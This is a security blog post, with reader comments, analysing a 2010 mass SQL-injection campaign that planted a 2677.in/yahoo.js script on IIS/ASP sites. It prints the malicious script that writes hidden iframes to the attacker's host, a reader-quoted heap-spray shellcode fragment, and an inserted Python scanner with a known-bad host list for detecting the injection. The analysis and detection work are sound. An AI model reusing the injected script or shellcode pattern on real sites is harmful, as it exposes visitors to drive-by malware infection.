Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Mass infection of IIS/ASP sites – 2677.in/yahoo.js

June 11, 2010, by David Dede


A large number of sites have been hacked again in the last few hours with a malware script pointing to http://2677.in/yahoo.js. Not only small sites, but some big ones got hit as well. It is the same SQL injection attack that was used in the robint-us mass infection a few days ago.

Some of the sites hacked this time:


This time Google says that around a thousand pages have been infected. This is the content of the yahoo.js script:

try{__m}catch(e){__m=1;document.title=document.title.replace(/<(w|W)*> /,"");document.write("< iframe src=http://2677.in/cnzz.html width=0 height==>
<iframe src=http://2677.in/ie.html width=22 height=1

So it loads malware from http://2677.in/ie.html, which then calls http://s11.cnzz.com to load the virus. This is the output of our scan against ameristar.com:
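A detection pass a site owner could run over crawled pages, or over HTML stored in database text columns, to find the injected script reference and the hidden iframes that yahoo.js writes. This is an added example, not Sucuri's scanner or the malware's code; the two sample pages are constructed here, and 2677.in, taken from the post, is the only known-bad host it ships with.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# Host named in the post as serving yahoo.js and ie.html; extend as needed.
KNOWN_BAD_HOSTS = {"2677.in"}

def _is_hidden(attrs):
    """True for an iframe sized away to 0/1 px or hidden via inline style."""
    def px(v):
        m = re.match(r"\s*(\d+)", v or "")
        return int(m.group(1)) if m else None
    w, h = px(attrs.get("width")), px(attrs.get("height"))
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return ((w is not None and w <= 1) or (h is not None and h <= 1)
            or "display:none" in style or "visibility:hidden" in style)

class InjectionScanner(HTMLParser):
    """Flags script/iframe tags pointing at a known-bad host and any hidden
    iframe. html.parser copes with the unquoted src=... the injection uses."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = (a.get("src") or "").strip()
        host = (urlparse(src).hostname or "").lower()
        if tag in ("script", "iframe") and any(
                host == bad or host.endswith("." + bad) for bad in KNOWN_BAD_HOSTS):
            self.findings.append(("known_bad_host", tag, src))
        if tag == "iframe" and _is_hidden(a):
            self.findings.append(("hidden_iframe", tag, src))

def scan_html(html):
    """Return a list of (reason, tag, src) findings for one page."""
    p = InjectionScanner()
    p.feed(html)
    return p.findings

# Constructed samples: an infected page (script injected after the title, plus the iframe yahoo.js writes) and the same page without the injection.
SAMPLE_INFECTED = (
    "<html><head><title>Products</title>"
    "<script src=http://2677.in/yahoo.js></script></head><body>"
    "<iframe src=http://2677.in/ie.html width=22 height=1></iframe>"
    '<iframe src="https://example.com/widget" width="300" height="200"></iframe>'
    "</body></html>")
SAMPLE_CLEAN = ('<html><head><title>Products</title></head><body><iframe '
                'src="https://example.com/widget" width="300" height="200">'
                "</iframe></body></html>")
```

Running scan_html over a site's pages and over the raw contents of text columns catches both forms: the stored injection (the script tag) and the iframe it produces once rendered.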

What is funny is that one of the top pages that got hacked was https://www.idera.com and their seminar about "Understanding SQL Server Security Options". Just search on Google for "http://2677.in/yahoo.js" inurl:.idera.com to see it.

If your site is hacked (or contains malware) and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.


Categories: Website Malware Infections, Website Security. Tags: Hacked Websites, Server Security.

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. ashcrow

    June 11, 2010

    Don't forget it's pulling of ie.html as well which seems to be attempting shellcode and also embeds a hidden anhey.swf.

    From the 'sun' div:
    """
    ….
    var a = new Array();
    var xcode=loader("log.txt","MM","NN")*262144;
    var shellcode=loader("log.txt","XX","YY");
    var ls = xcode-(shellcode.length*2 0x01020);
    var b = loader("log.txt","VV","WW");
    while(b.length<ls)
    {
    b =b;
    }
    var lh=b.substring(0,ls/2);
    delete b;
    lh = lh shellcode;
    ….
    """

  2. ashcrow

    June 11, 2010

    anhey.swf is caught by 2 antivirus packages as a generic trojan: https://www.virustotal.com/analisis/725f0cc85e341… …

  3. @dont

    June 12, 2010

    Had the registrar suspend the domain name ~ 5 hrs ago.

  4. spenser

    June 13, 2010

    This is exactly why sites that force javascript on visitors is exactly the wrong thing to do.

    When online banking users are forced to adopt loose security settings to do the simplest of tasks, then eventually they become the default, and that’s when things go wrong.

    Security conscious sites should *not* let their developers run amok demanding ever greater browser permissions. Instead, they should be looking at opportunities to work with less browser permissions.

  5. jj

    June 13, 2010

    Since the Idera pages are httpS, they will pass right through any firewalls, proxy servers and unified threat management gateways that do not perform man-in-the-middle SSL interception. That leaves just the desktop AV to defend corporate networks and we all know how weak of a defense they are.

  6. @contentonist

    June 14, 2010

    found a new website that appears to host the same script;

    4589DOTin/yahoo.js

  7. Test

    June 15, 2010

    What is the 3rd party app installed that is vulnerable to SQL injection? That is, what vulnerability in the sites is allowing malicious users to inject the malware to begin with?
